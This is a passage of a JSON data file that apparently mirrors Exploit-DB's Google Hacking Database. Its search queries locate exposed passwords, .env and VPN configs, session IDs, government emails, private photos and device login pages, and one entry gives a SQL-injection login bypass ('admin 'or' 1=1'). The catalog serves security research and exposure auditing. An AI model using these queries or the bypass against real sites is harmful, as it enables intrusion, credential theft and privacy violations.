"http://www.google.com/search?q=inurl:dfshealth.jsp", "shortDescription": "inurl:dfshealth.jsp", "textualDescription": "dork:inurl:dfshealth.jsp\n\ndirect get the access of hadoop cluster with root user\n\n\n-- \nSimmant Yadav" }, { "signatureReferenceNumber": "3952", "link": "https://www.exploit-db.com/ghdb/3952/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "shortDescription": "(\"DMZ\" | \"Public IP\" | \"Private IP\") filetype:xls", "textualDescription": "Files with information DMZ, public IP, private IP network segments, etc.\n\nDaniel Maldonado\nhttp://caceriadespammers.com.ar" }, { "signatureReferenceNumber": "3953", "link": "https://www.exploit-db.com/ghdb/3953/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "shortDescription": "inurl:\"/munin/network-*.html\" OR inurl:\"/munin/apache-*.html\" OR inurl:\"/munin/disk-*.html\" OR inurl:\"/munin/system-*.html\" OR inurl:\"/munin/munin-*.html\" OR inurl:\"/munin/problems.html\"", "textualDescription": "Search the Munin monitoring graphs\n\nDaniel Maldonado\nhttp://caceriadespammers.blogspot.com.ar" }, { "signatureReferenceNumber": "3954", "link": "https://www.exploit-db.com/ghdb/3954/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "shortDescription": "SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "textualDescription": "inurl:/SiteScope/cgi/go.exe/SiteScope?page=\n\ntwitter\n@firebitsbr" }, { "signatureReferenceNumber": "3955", "link": "https://www.exploit-db.com/ghdb/3955/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:sql site:gov and \"insert into\"", "shortDescription": "filetype:sql site:gov and \"insert into\"", "textualDescription": "filetype:sql site:gov and \"insert into\" \n\nfind sql files with data on governments sites" }, { "signatureReferenceNumber": "3956", "link": "https://www.exploit-db.com/ghdb/3956/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "shortDescription": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "textualDescription": "Hits: 4,250 results\n\nThis dork finds PacketCable 1.0 Touchstone Telephony Modems that are online\nwherein you see its event logs, system information, interface parameters,\nmac addresses, etc.\n\n*Jay Turla a.k.a shipcode*" }, { "signatureReferenceNumber": "3957", "link": "https://www.exploit-db.com/ghdb/3957/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:sql site:com and \"insert into\" admin \"2014\"", "shortDescription": "http://www.google.com/search?q=filetype:sql site:com and \"insert into\" admin \"2014\"", "textualDescription": "filetype:sql site:com and \"insert into\" admin \"2014\"\n\n\nhttp://facebook.com/groups/hfrosario" }, { "signatureReferenceNumber": "3958", "link": "https://www.exploit-db.com/ghdb/3958/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"index\" intext:\"Login to the Administrative Interface\"", "shortDescription": "intitle:\"index\" intext:\"Login to the Administrative Interface\"", "textualDescription": "via Priyal Viroja" }, { "signatureReferenceNumber": "3959", "link": "https://www.exploit-db.com/ghdb/3959/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "shortDescription": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "textualDescription": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini\n\n\nFiles containing passwords\n\nBy Dr4GoR1Ty" }, { "signatureReferenceNumber": "3960", "link": "https://www.exploit-db.com/ghdb/3960/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "shortDescription": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "textualDescription": "ATM Passwords\n\n\"automatic teller\" \"operator manual\" \"password\" filetype:pdf" }, { "signatureReferenceNumber": "3961", "link": "https://www.exploit-db.com/ghdb/3961/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=\"google confidential\" filetype:pdf", "shortDescription": "\"google confidential\" filetype:pdf", "textualDescription": "\"google confidential\" filetype:pdf\n\nGoogle leaking their own files" }, { "signatureReferenceNumber": "3962", "link": "https://www.exploit-db.com/ghdb/3962/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:\"virtual office\" sonicwall domain", "shortDescription": "intitle:\"virtual office\" sonicwall domain", "textualDescription": "Network or vulnerability data\nIP address AD Domain NameLogin entry/method for internal network" }, { "signatureReferenceNumber": "3963", "link": "https://www.exploit-db.com/ghdb/3963/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?q=dcid= bn= pin code=", "shortDescription": "dcid= bn= pin code=", "textualDescription": "Information disclosure of reservation information,which can leak to many other leaks.\n\nAll related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passport \n\nBy popshark1" }, { "signatureReferenceNumber": "3964", "link": "https://www.exploit-db.com/ghdb/3964/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=ext:cgi inurl:cgi-bin intext:#!/bin/bash", "shortDescription": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "textualDescription": "gnu-bash site dorks\n\nAriel Anonis - @ariel_anonis" }, { "signatureReferenceNumber": "3965", "link": "https://www.exploit-db.com/ghdb/3965/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "shortDescription": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "textualDescription": "Search for samAccountName (an ActiveDirectory attribute). 50/50 success, some usernames disclosed along with other information." }, { "signatureReferenceNumber": "3966", "link": "https://www.exploit-db.com/ghdb/3966/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "shortDescription": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "textualDescription": "Looks for text files with SHA1 of \"password\". These could be tips (not very useful), config files, other peoples wordlist dumps, etc" }, { "signatureReferenceNumber": "3967", "link": "https://www.exploit-db.com/ghdb/3967/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:FRITZ!Box inurl:login.lua", "shortDescription": "intitle:FRITZ!Box inurl:login.lua", "textualDescription": "Show open FritzBox-Router with\nintitle:FRITZ!Box inurl:login.lua" }, { "signatureReferenceNumber": "3968", "link": "https://www.exploit-db.com/ghdb/3968/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:logon.html \"CSCOE\"", "shortDescription": "inurl:logon.html \"CSCOE\"", "textualDescription": "Pages containing login portals - Web Server Detection \n\nFinds logins portals for Cisco ASA Clientless Webvpn\n\ninurl:logon.html \"CSCOE\"" }, { "signatureReferenceNumber": "3969", "link": "https://www.exploit-db.com/ghdb/3969/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:cgi-bin/mailgraph.cgi", "shortDescription": "inurl:cgi-bin/mailgraph.cgi", "textualDescription": "Mail statistics\n\n\nAriel Anonis - @ariel_anonis" }, { "signatureReferenceNumber": "3970", "link": "https://www.exploit-db.com/ghdb/3970/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:log intext:org.apache.hadoop.hdfs", "shortDescription": "filetype:log intext:org.apache.hadoop.hdfs", "textualDescription": "Dork : filetype:log intext:org.apache.hadoop.hdfs\n\nList of Log files which contain details about internal and External ip in\nHadoop Grid\n.This Log Files generated after every batch process.\n-- \nSimmant Yadav" }, { "signatureReferenceNumber": "3971", "link": "https://www.exploit-db.com/ghdb/3971/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "shortDescription": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "textualDescription": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org\n\nlook for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch. Ignore github and drupal.org" }, { "signatureReferenceNumber": "3972", "link": "https://www.exploit-db.com/ghdb/3972/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "shortDescription": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "textualDescription": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com\n\nsites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txt\n\nCan then check the CHANGELOG.txt file manually for version (not 7.32?)." }, { "signatureReferenceNumber": "3973", "link": "https://www.exploit-db.com/ghdb/3973/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:msg OR ext:eml site:gov OR site:edu", "shortDescription": "ext:msg OR ext:eml site:gov OR site:edu", "textualDescription": "Mails leak by Rootkit." }, { "signatureReferenceNumber": "3974", "link": "https://www.exploit-db.com/ghdb/3974/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "shortDescription": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "textualDescription": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"\nDork to find gov't emails.\n~ Carl" }, { "signatureReferenceNumber": "3975", "link": "https://www.exploit-db.com/ghdb/3975/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext:\"Please Authenticate\" intitle:Peakflow", "shortDescription": "intext:\"Please Authenticate\" intitle:Peakflow", "textualDescription": "Pages containing login portals - Web Server Detection\n\nFinds Login portals for Arbor Peakflow (Anti-DDoS System)\n\nTwitter - @libborius" }, { "signatureReferenceNumber": "3976", "link": "https://www.exploit-db.com/ghdb/3976/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:log telnet intext:password", "shortDescription": "ext:log telnet intext:password", "textualDescription": "Telnet logs.\nBy Rootkit." }, { "signatureReferenceNumber": "3977", "link": "https://www.exploit-db.com/ghdb/3977/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:mobileconfig intext:password OR intext:pass", "shortDescription": "filetype:mobileconfig intext:password OR intext:pass", "textualDescription": "filetype:mobileconfig intext:password OR intext:pass" }, { "signatureReferenceNumber": "3978", "link": "https://www.exploit-db.com/ghdb/3978/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:yahoo_site_admin/credentials/", "shortDescription": "inurl:yahoo_site_admin/credentials/", "textualDescription": "# Exploit Title: [Yahoo Hosting db-credentials]\n# Google Dork: [inurl:yahoo_site_admin/credentials/]\n# Date: [29/11/2014]\n# Exploit Author: [Mohammad Shahein]\n# Vendor Homepage: [www.boxeffect.com ]\n# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]\n\nGoogle the dork it will allow you to download db.conf the file will contain\nthe following info\n\n\n mysql\n [ database name ]\n [ database user name ]\n [ database password ]\n\n\n*Mohammad Shaheen*\nsenior Programer, BoxEffect\nwebsite: www.boxeffect.com" }, { "signatureReferenceNumber": "3979", "link": "https://www.exploit-db.com/ghdb/3979/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:pem intext:BEGIN CERTIFICATE", "shortDescription": "ext:pem intext:BEGIN CERTIFICATE", "textualDescription": "Vulnerables CA files.\nBy Rootkit." }, { "signatureReferenceNumber": "3980", "link": "https://www.exploit-db.com/ghdb/3980/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "shortDescription": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "textualDescription": "Upload Vulnerability Elfinder 2.0\n\ninurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"" }, { "signatureReferenceNumber": "3981", "link": "https://www.exploit-db.com/ghdb/3981/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "shortDescription": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "textualDescription": "Files found with this google dork will show juicy information about a\nmigration of a complete wordpress site, including the location of a .zip\nfile where the complete site is stored including \"wp-config.php\",\n\".htaccess\" and other interesting private files.\n\nThis file is the result of a migration with the Wordpress plugin\n\"Duplicator\".\n\nAuthor: @felmoltor" }, { "signatureReferenceNumber": "3982", "link": "https://www.exploit-db.com/ghdb/3982/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:dyn_sensors.htm", "shortDescription": "inurl:dyn_sensors.htm", "textualDescription": "MiniGoose II environmental temprature monitoring panel \n\nAuthor:@cns0x" }, { "signatureReferenceNumber": "3983", "link": "https://www.exploit-db.com/ghdb/3983/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/cgi-bin/.cgi", "shortDescription": "inurl:/cgi-bin/.cgi", "textualDescription": "Finds open index of /cgi-bin." }, { "signatureReferenceNumber": "3984", "link": "https://www.exploit-db.com/ghdb/3984/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "shortDescription": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "textualDescription": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled\n\nSearches for fckeditor default url and which has a config.asp file where configisenabled = true. Unable to search for true value directly because file contains 'example' which could lead to false positive. If found, traversing two directories up to /connectors/ should present an uploadtest.html file.\n\nThis may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits." }, { "signatureReferenceNumber": "3985", "link": "https://www.exploit-db.com/ghdb/3985/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:\"/server-info\" intext:\"Loaded Modules\"", "shortDescription": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "textualDescription": "Search Apache server information though default module info_module:\n\ninurl:\"/server-info\" intext:\"Loaded Modules\"\n\nAuthor: @felmoltor\n\n-- \nFelipe Molina de la Torre" }, { "signatureReferenceNumber": "3986", "link": "https://www.exploit-db.com/ghdb/3986/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=inurl:\"security/xamppdirpasswd.txt\"", "shortDescription": "inurl:\"security/xamppdirpasswd.txt\"", "textualDescription": "This dork shows the plain text password saved in a XAMPP installation when\nthe administrator configures \"Security Console MySQL & XAMPP directory\nprotection\":\n\ninurl:\"security/xamppdirpasswd.txt\"\n\nAuthor: @felmoltor\n\n-- \nFelipe Molina de la Torre" }, { "signatureReferenceNumber": "3987", "link": "https://www.exploit-db.com/ghdb/3987/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "shortDescription": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "textualDescription": "Hi,\n\nThis google dork to find sensitive and interesting information under\nWEB-INF directory via ftp protocol, for example:\n\n* Website map\n* Sensitive information (user name and password for webdave)\n* Deployment descriptor in java (web.xml)\n* Servlet mapping url pattern\n\n\nKeyword:\nfiletype:xml inurl:/WEB-INF/ inurl:ftp:// -www\n\n-- \nFahad Altamimi" }, { "signatureReferenceNumber": "3988", "link": "https://www.exploit-db.com/ghdb/3988/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=\".git\" intitle:\"Index of\"", "shortDescription": "\".git\" intitle:\"Index of\"", "textualDescription": "Shows publicly browsable .git directories" }, { "signatureReferenceNumber": "3989", "link": "https://www.exploit-db.com/ghdb/3989/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:.cgi-bin/webproc", "shortDescription": "inurl:.cgi-bin/webproc", "textualDescription": "inurl:.cgi-bin/webproc\nLogin for various type of router.\nBy Rootkit." }, { "signatureReferenceNumber": "3990", "link": "https://www.exploit-db.com/ghdb/3990/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:.cgi-bin/luci", "shortDescription": "inurl:.cgi-bin/luci", "textualDescription": "Directory \" Powered by LuCI Trunk\".\nBy Rootkit." }, { "signatureReferenceNumber": "3991", "link": "https://www.exploit-db.com/ghdb/3991/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"jos_users\" intitle:\"Index of\"", "shortDescription": "\"jos_users\" intitle:\"Index of\"", "textualDescription": "\"jos_users\" intitle:\"Index of\"\nFiles of configuration of user Joomla servers.\nBy Rootkit." }, { "signatureReferenceNumber": "3992", "link": "https://www.exploit-db.com/ghdb/3992/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "shortDescription": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "textualDescription": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"\n\nShare-Link" }, { "signatureReferenceNumber": "3993", "link": "https://www.exploit-db.com/ghdb/3993/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=\"Config\" intitle:\"Index of\" intext:vpn", "shortDescription": "\"Config\" intitle:\"Index of\" intext:vpn", "textualDescription": "Directory with keys of vpn servers.\nBy Rootkit." }, { "signatureReferenceNumber": "3994", "link": "https://www.exploit-db.com/ghdb/3994/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:/wp-content/wpbackitup_backups", "shortDescription": "inurl:/wp-content/wpbackitup_backups", "textualDescription": "Relates to https://wordpress.org/plugins/wp-backitup/\n\nSensitive data/site rips/db rips in public accessible folders\n\nMr T3st3r" }, { "signatureReferenceNumber": "3995", "link": "https://www.exploit-db.com/ghdb/3995/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=allinurl:moadmin.php -google -github", "shortDescription": "allinurl:moadmin.php -google -github", "textualDescription": "The dork \"allinurl:moadmin.php -google -github\" show all the sites that\nuses Mongo DB\nand the moadmin module to amministrate it.\n\nSome versions of this module allow non autenticated user to execute\narbitrary Unix commands sending a special POST request documented here:\nhttp://www.exploit-db.com/exploits/36251/\n\nPsyDel" }, { "signatureReferenceNumber": "3996", "link": "https://www.exploit-db.com/ghdb/3996/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:sql intext:\"alter user\" intext:\"identified by\"", "shortDescription": "ext:sql intext:\"alter user\" intext:\"identified by\"", "textualDescription": "This dork will show files containing SQL instructions where the\nadministrator set a password for a database user.\n\nAuthor: @felmoltor" }, { "signatureReferenceNumber": "3997", "link": "https://www.exploit-db.com/ghdb/3997/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "shortDescription": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "textualDescription": "The dork \"allintext:Copyright Smart PHP Poll. All Rights Reserved.\n-exploit\" show all the sites that uses Smart Pool php module.\n\nThe login page can be bypassed using these credentials\n\nUser: admin 'or' 1=1\nPassword: anything\n\nMore info here: http://www.exploit-db.com/exploits/36386/\n\n\nPsyDel" }, { "signatureReferenceNumber": "3998", "link": "https://www.exploit-db.com/ghdb/3998/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:index of /weekly cpbackup", "shortDescription": "intitle:index of /weekly cpbackup", "textualDescription": "useful for finding cpanel backups\n\n-- \nRegards,\nH.R." }, { "signatureReferenceNumber": "3999", "link": "https://www.exploit-db.com/ghdb/3999/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of +\"Indexed by Apache::Gallery\"", "shortDescription": "intitle:index.of +\"Indexed by Apache::Gallery\"", "textualDescription": "Google dork for finding Private pics ;) :D\n\n#13lacKDemOn" }, { "signatureReferenceNumber": "4000", "link": "https://www.exploit-db.com/ghdb/4000/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of.accounts", "shortDescription": "intitle:index.of.accounts", "textualDescription": "Dork for directory with accounts.\nBy Rootkit." }, { "signatureReferenceNumber": "4001", "link": "https://www.exploit-db.com/ghdb/4001/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:index.of.dropbox", "shortDescription": "intitle:index.of.dropbox", "textualDescription": "Sensitive Directories\n\nAriel Anonis - @ariel_anonis" }, { "signatureReferenceNumber": "4002", "link": "https://www.exploit-db.com/ghdb/4002/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "shortDescription": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "textualDescription": "Google dork to find session IDs and potentially impersonate users:\n\nintext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log\n\nRegards,\nGabor Szathmari" }, { "signatureReferenceNumber": "4003", "link": "https://www.exploit-db.com/ghdb/4003/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "shortDescription": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "textualDescription": "## Open Seagate NAS drives\ninurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive\n\n\nJason Coleman - CISSP, GWAPT\nAnalyst, Security Management Program | Verizon Enterprise Solutions" }, { "signatureReferenceNumber": "4004", "link": "https://www.exploit-db.com/ghdb/4004/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:upsstats.cgi?host", "shortDescription": "inurl:upsstats.cgi?host", "textualDescription": "UPS Online Devices. Enjoy!!!.\nBy Rootkit." }, { "signatureReferenceNumber": "4005", "link": "https://www.exploit-db.com/ghdb/4005/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=ext:csv intext:\"password\"", "shortDescription": "ext:csv intext:\"password\"", "textualDescription": "This dork finds csv files containing passwords and other juicy information.\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4006", "link": "https://www.exploit-db.com/ghdb/4006/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pub inurl:ssh", "shortDescription": "filetype:pub inurl:ssh", "textualDescription": "This dork finds various SSH pub files.\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4007", "link": "https://www.exploit-db.com/ghdb/4007/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index of ftp\"", "shortDescription": "intitle:\"Index of ftp\"", "textualDescription": "This dork finds open ftps. This is a base dork, where you can add\nintext:\"ssh/\" for folder search and intext:\"-2015\" for dates and years.\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4008", "link": "https://www.exploit-db.com/ghdb/4008/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "shortDescription": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "textualDescription": "This dork finds vulnerabel revslider plugins.\nIn reference to the exploit submitted by Adri\u00e1n M. F.\n\nhttps://www.exploit-db.com/exploits/37067/\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4009", "link": "https://www.exploit-db.com/ghdb/4009/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:wp-admin/ intext:css/", "shortDescription": "inurl:wp-admin/ intext:css/", "textualDescription": "The dork finds misconfigured WordPress sites.\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4010", "link": "https://www.exploit-db.com/ghdb/4010/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/wp-admin/post.php?post=", "shortDescription": "inurl:/wp-admin/post.php?post=", "textualDescription": "This dork finds websites which could be exploitable using Adri\u00e1n M. F.\nlanding page exploit - https://www.exploit-db.com/exploits/37108/\n\nAuthor:NickiK." }, { "signatureReferenceNumber": "4011", "link": "https://www.exploit-db.com/ghdb/4011/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl:/graphs/ intitle:RouterOs", "shortDescription": "inurl:/graphs/ intitle:RouterOs", "textualDescription": "files containing juicy info\n\nAriel Anonis - @ariel_anonis" }, { "signatureReferenceNumber": "4012", "link": "https://www.exploit-db.com/ghdb/4012/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=intext:DB_PASSWORD ext:env", "shortDescription": "intext:DB_PASSWORD ext:env", "textualDescription": "This dork finds env files, usually used in Laravel configuration, \ncontaining passwords and other juicy information.\n\nAuthor: Augusto Pereira" }, { "signatureReferenceNumber": "4013", "link": "https://www.exploit-db.com/ghdb/4013/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"index of\" \"archive.pst\" -contrib", "shortDescription": "intitle:\"index of\" \"archive.pst\" -contrib", "textualDescription": "Google Dork: intitle:\"index of\" \"archive.pst\" -contrib\nAuthor: Sphearis\n\nThis dork allows you to see Outlook archive files stored in the open. These\nfiles can be opened with a simple .pst viewer to read all emails it\ncontains.\nThe \"-contrib\" has been added to filter Cran installations which uses a\ndirectory structure similar to the search terms." }, { "signatureReferenceNumber": "4014", "link": "https://www.exploit-db.com/ghdb/4014/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl:/dbg-wizard.php", "shortDescription": "inurl:/dbg-wizard.php", "textualDescription": "# Exploit Title: Nusphere PHP DBG wizard\n# Date: 02-06-2015\n# Vendor Homepage: http://www.nusphere.com\n# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm\n# Version: any\n# Exploit Author: Alfred Armstrong\n# Contact: http://twitter.com/alfaguru\n# Website: http://figure-w.co.uk\n\nDBG Wizard is meant to be used with the DBG PHP debugger as an aid to\nconfiguring it correctly. It is supplied as a PHP script called\ndbg-wizard.php which when placed in the root folder of a web site and\nexecuted provides instructions to the user about setting up their web\nserver so the debugger can be used.\n\nIt is not meant to be present on a live site as it exposes details\nabout software configurations and versions which might allow an\nattacker to discover other vulnerabilities. If the DBG shared library\nis also installed it will expose that fact and potentially assist an\nattacker in crafting a request to start a debug session in which they\ncould do anything that can be done through a PHP script, including\nreading files and accessing database entries.\n\n--\nAlfred Armstrong" }, { "signatureReferenceNumber": "4015", "link": "https://www.exploit-db.com/ghdb/4015/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"index of\" \"onetoc2\" \"one\"", "shortDescription": "intitle:\"index of\" \"onetoc2\" \"one\"", "textualDescription": "# Exploit Title: intitle:\"index of\" \"onetoc2\" \"one\"\n# Google Dork: intitle:\"index of\" \"onetoc2\" \"one\"\n# Date: 04/06/2015\n# Exploit Author: Sphearis\n# Vendor Homepage: NA\n# Software Link: NA\n# Version: NA\n# Tested on: ALL\n# CVE : NA\n\nThis dork allows you to see Onenote files stored in the open(*.one). These\nfiles can be read easily with Onenote or a compatible viewer, no password,\nno encryption.\nThe onetoc2 is added, it's a worthless file but is always inside a folder\ncontaining one or several onenote files(and it obviously helps narrowing\nthe search to what we're looking for)." }, { "signatureReferenceNumber": "4016", "link": "https://www.exploit-db.com/ghdb/4016/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "shortDescription": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "textualDescription": "This Dork reveal the folders of \"Inbox\" and \"Sent\" for mail servers. Enjoy." }, { "signatureReferenceNumber": "4017", "link": "https://www.exploit-db.com/ghdb/4017/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=inurl:private_files", "shortDescription": "inurl:private_files", "textualDescription": "Directory private files xD.\nBy Rootkit." }, { "signatureReferenceNumber": "4018", "link": "https://www.exploit-db.com/ghdb/4018/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=filetype:pcf vpn OR Group", "shortDescription": "filetype:pcf vpn OR Group", "textualDescription": "Google Dork: filetype:pcf vpn OR Group\nAuthor: azupwn\n\nThis dork allows you to search for publicly accessible profile\nconfiguration files (.pcf) used by VPN clients. These files typically\ncontain usernames, password, tunneling ports, VPN server information and\nother information.\n\n\nCheers,\n-- \nazupwn" }, { "signatureReferenceNumber": "4019", "link": "https://www.exploit-db.com/ghdb/4019/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:\"index of\" \"fic\" \"ndx\"", "shortDescription": "intitle:\"index of\" \"fic\" \"ndx\"", "textualDescription": "# Exploit Title: intitle:\"index of\" \"fic\" \"ndx\"\n# Google Dork: intitle:\"index of\" \"fic\" \"ndx\"\n# Date: 10/06/2015\n# Exploit Author: Sphearis\n\nThis dork allows you to look for Hyperfile databases(.FIC) stored in the\nopen. You can simply read them in a text editor(You'll see the header and\nthen the database content in plain text) or you can convert them(to xml,\nexcel, ...) with free software. In order to convert them, you also need the\nlinked index file (.NDX) and optional mmo file which are located in the\nsame directory.\nSome Windev/Webdev installations store usernames and other sensitive\ninformation in that kind of file." }, { "signatureReferenceNumber": "4020", "link": "https://www.exploit-db.com/ghdb/4020/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "shortDescription": "intitle:\"Index Of\" 